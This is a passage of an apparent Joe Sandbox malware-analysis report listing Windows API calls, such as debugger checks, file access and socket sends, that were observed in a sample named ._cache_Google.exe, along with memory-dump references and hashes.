                                                                                                                                                                              • IsThemeActive.UXTHEME ref: 004B36E6
                                                                                                                                                                                • Part of subcall function 004D2025: __lock.LIBCMT ref: 004D202B
                                                                                                                                                                                • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 004B32F6
                                                                                                                                                                                • Part of subcall function 004B32DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 004B330B
                                                                                                                                                                                • Part of subcall function 004B374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 004B376D
                                                                                                                                                                                • Part of subcall function 004B374E: IsDebuggerPresent.KERNEL32(?,?), ref: 004B377F
                                                                                                                                                                                • Part of subcall function 004B374E: GetFullPathNameW.KERNEL32(C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00000104,?,00571120,C:\Users\user\AppData\Local\Temp\._cache_Google.exe,00571124,?,?), ref: 004B37EE
                                                                                                                                                                                • Part of subcall function 004B374E: SetCurrentDirectoryW.KERNEL32(?), ref: 004B3860
                                                                                                                                                                              • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 004B3726
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme__lock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 924797094-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,004B4C2B,?,?,?,?,004BBE63), ref: 004B4BB6
                                                                                                                                                                              • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,004B4C2B,?,?,?,?,004BBE63), ref: 00524972
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CreateFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 823142352-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,004FAEA5,?,?,00000000,00000008), ref: 004CF282
                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,004FAEA5,?,?,00000000,00000008), ref: 004CF2A6
                                                                                                                                                                                • Part of subcall function 004CF2D0: _memmove.LIBCMT ref: 004CF307
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3033907384-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ___lock_fhandle.LIBCMT ref: 004DF7D9
                                                                                                                                                                              • __close_nolock.LIBCMT ref: 004DF7F2
                                                                                                                                                                                • Part of subcall function 004D886A: __getptd_noexit.LIBCMT ref: 004D886A
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1046115767-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • send.WS2_32(00000000,?,00000000,00000000), ref: 00509534
                                                                                                                                                                              • WSAGetLastError.WSOCK32(00000000,?,00000000,00000000), ref: 00509557
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ErrorLastsend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1802528911-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D45EC: __FF_MSGBANNER.LIBCMT ref: 004D4603
                                                                                                                                                                                • Part of subcall function 004D45EC: __NMSG_WRITE.LIBCMT ref: 004D460A
                                                                                                                                                                                • Part of subcall function 004D45EC: RtlAllocateHeap.NTDLL(00F00000,00000000,00000001,?,?,?,?,004D0127,?,004B125D,00000058,?,?), ref: 004D462F
                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 004D013E
                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 004D0153
                                                                                                                                                                                • Part of subcall function 004D7495: RaiseException.KERNEL32(?,?,004B125D,00566598,?,?,?,004D0158,004B125D,00566598,?,00000001), ref: 004D74E6
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3902256705-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004D889E: __getptd_noexit.LIBCMT ref: 004D889E
                                                                                                                                                                              • __lock_file.LIBCMT ref: 004D42B9
                                                                                                                                                                                • Part of subcall function 004D5A9F: __lock.LIBCMT ref: 004D5AC2
                                                                                                                                                                              • __fclose_nolock.LIBCMT ref: 004D42C4
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2800547568-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • timeGetTime.WINMM ref: 004CF57A
                                                                                                                                                                                • Part of subcall function 004BE1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004BE279
                                                                                                                                                                              • Sleep.KERNEL32(00000000), ref: 005275D3
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessagePeekSleepTimetime
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1792118007-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B84A6: __swprintf.LIBCMT ref: 004B84E5
                                                                                                                                                                                • Part of subcall function 004B84A6: __itow.LIBCMT ref: 004B8519
                                                                                                                                                                              • __wcsnicmp.LIBCMT ref: 004B83C4
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 712828618-0
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 004B4F8F
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: select
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1274211008-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004B3F5D: FreeLibrary.KERNEL32(00000000,?), ref: 004B3F90
                                                                                                                                                                                • Part of subcall function 004D4129: __wfsopen.LIBCMT ref: 004D4134
                                                                                                                                                                              • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,004B34E2,?,00000001), ref: 004B3FCD
                                                                                                                                                                                • Part of subcall function 004B3E78: FreeLibrary.KERNEL32(00000000), ref: 004B3EAB
                                                                                                                                                                                • Part of subcall function 004B4010: _memmove.LIBCMT ref: 004B405A
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1396898556-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: ClearVariant
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1473721057-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: LibraryLoad
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 1029625771-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,004B4E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 004B4CF7
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: _memmove
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 4104443479-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • WSAStartup.WSOCK32(00000202,?), ref: 005095C9
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Startup
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 724789610-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,?,?,004B34E2,?,00000001), ref: 004B3E6D
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FreeLibrary
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3664257935-0
APIs
• SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 004F7A11
  • Part of subcall function 004B7E53: _memmove.LIBCMT ref: 004B7EB9
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: FolderPath_memmove
• String ID:
• API String ID: 3334745507-0
APIs
• SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: MessageSendTimeout
• String ID:
• API String ID: 1599653421-0
APIs
  • Part of subcall function 004B193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 004B1952
• SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 004EE3AA
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: MessageSend$Timeout
• String ID:
• API String ID: 1777923405-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: TextWindow
• String ID:
• API String ID: 530164218-0
APIs
• SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?,?,?,005249DA,?,?,00000000), ref: 004B4FC4
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: FilePointer
• String ID:
• API String ID: 973152223-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
APIs
Memory Dump Source
• Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
• Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
• Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
                                                                                                                                                                              APIs
                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,004B50BE,?,004B5088,?,004BBE3D,005722E8,?,00000000,?,004B3E2E,?,00000000,?), ref: 004B510C
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 00000004.00000002.2718127458.00000000004B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 004B0000, based on PE: true
                                                                                                                                                                              • Associated: 00000004.00000002.2717940174.00000000004B0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000053D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2718647184.000000000055E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719237589.000000000056A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                              • Associated: 00000004.00000002.2719429623.0000000000574000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_4_2_4b0000_UNK_.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CloseHandle
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2962429428-0
                                                                                                                                                                              • Opcode ID: cb528b4426cb51269920cc6f175aead43efe424b7cbe691bf0e2431cb1f9df7a
                                                                                                                                                                              • Instruction ID: 654e01873fa11cc6942bd7cdeada659ce248a5c95652dd71d93509fbc2372386
                                                                                                                                                                              • Opcode Fuzzy Hash: cb528b4426cb51269920cc6f175aead43efe424b7cbe691bf0e2431cb1f9df7a
                                                                                                                                                                              • Instruction Fuzzy Hash: 80E0B675800B12CBC2315F1AE804553FBF9FFE13613218A2FD0E582660D7B4548ADBA4
                                                                                                                                                                              APIs
                                                                                                                                                                                • Part of subcall function 004CAF7D: GetWindowLongW.USER32(?,000000EB), ref: 004CAF8E
                                                                                                                                                                              • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?,?), ref: 0051F64E
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F6AD
                                                                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 0051F6EA
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F711
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051F737
                                                                                                                                                                              • _wcsncpy.LIBCMT ref: 0051F7A3
                                                                                                                                                                              • GetKeyState.USER32(00000011), ref: 0051F7C4
                                                                                                                                                                              • GetKeyState.USER32(00000009), ref: 0051F7D1
                                                                                                                                                                              • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0051F7E7
                                                                                                                                                                              • GetKeyState.USER32(00000010), ref: 0051F7F1
                                                                                                                                                                              • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0051F820
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051F843
                                                                                                                                                                              • SendMessageW.USER32(?,00001030,?,0051DE69), ref: 0051F940
                                                                                                                                                                              • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?,?), ref: 0051F956
                                                                                                                                                                              • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0051F967
                                                                                                                                                                              • SetCapture.USER32(?), ref: 0051F970
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051F9D4
                                                                                                                                                                              • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0051F9E0
                                                                                                                                                                              • InvalidateRect.USER32(?,00000000,00000001,?,?,?,?), ref: 0051F9FA
                                                                                                                                                                              • ReleaseCapture.USER32 ref: 0051FA05
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051FA3A
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0051FA47
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FAA9
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FAD3
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FB12
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FB3D
                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0051FB55
                                                                                                                                                                              • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0051FB60
                                                                                                                                                                              • GetCursorPos.USER32(?), ref: 0051FB81
                                                                                                                                                                              • ScreenToClient.USER32(?,?), ref: 0051FB8E
                                                                                                                                                                              • GetParent.USER32(?), ref: 0051FBAA
                                                                                                                                                                              • SendMessageW.USER32(?,00001012,00000000,?), ref: 0051FC10
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FC40
                                                                                                                                                                              • ClientToScreen.USER32(?,?), ref: 0051FC96
                                                                                                                                                                              • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0051FCC2
                                                                                                                                                                              • SendMessageW.USER32(?,00001111,00000000,?), ref: 0051FCEA
                                                                                                                                                                              • SendMessageW.USER32 ref: 0051FD0D
